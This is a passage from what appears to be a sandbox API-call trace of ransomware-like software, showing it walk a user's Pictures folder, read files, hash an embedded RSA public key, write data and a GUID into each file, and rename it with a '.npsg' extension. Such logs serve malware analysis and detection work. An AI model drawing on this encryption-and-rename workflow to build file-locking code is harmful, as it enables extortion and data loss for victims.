wBKbSvaIoJ2e\\lEiN6S__d\\WHsE_LScbPcalufoZ3iC.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\whse_lscbpcalufoz3ic.gif.npsg")) returned 1 [0239.182] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bc7b500, ftCreationTime.dwHighDateTime=0x1d5bd6e, ftLastAccessTime.dwLowDateTime=0x62ef0970, ftLastAccessTime.dwHighDateTime=0x1d5b9cb, ftLastWriteTime.dwLowDateTime=0x62ef0970, ftLastWriteTime.dwHighDateTime=0x1d5b9cb, nFileSizeHigh=0x0, nFileSizeLow=0x143da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ypy HzERvj0meW9-.jpg", cAlternateFileName="YPYHZE~1.JPG")) returned 1 [0239.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.182] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\ypy HzERvj0meW9-.jpg") returned=".jpg" [0239.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\ypy HzERvj0meW9-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\ypy hzervj0mew9-.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.183] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=82906) returned 1 [0239.183] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.186] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x143b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.186] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.188] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x143da, lpOverlapped=0x0) returned 1 [0239.189] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.189] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.189] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.189] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.190] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.191] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.191] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.191] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.191] GetLastError () returned 0x0 [0239.191] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.191] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.191] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.191] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.191] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.192] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.193] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x143da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.193] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.193] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.193] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.193] CloseHandle (hObject=0x644) returned 1 [0239.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0239.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b89cd0 [0239.197] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\ypy HzERvj0meW9-.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\ypy hzervj0mew9-.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\ypy HzERvj0meW9-.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\ypy hzervj0mew9-.jpg.npsg")) returned 1 [0239.199] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bc7b500, ftCreationTime.dwHighDateTime=0x1d5bd6e, ftLastAccessTime.dwLowDateTime=0x62ef0970, ftLastAccessTime.dwHighDateTime=0x1d5b9cb, ftLastWriteTime.dwLowDateTime=0x62ef0970, ftLastWriteTime.dwHighDateTime=0x1d5b9cb, nFileSizeHigh=0x0, nFileSizeLow=0x143da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ypy HzERvj0meW9-.jpg", cAlternateFileName="YPYHZE~1.JPG")) returned 0 [0239.199] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.199] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.199] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 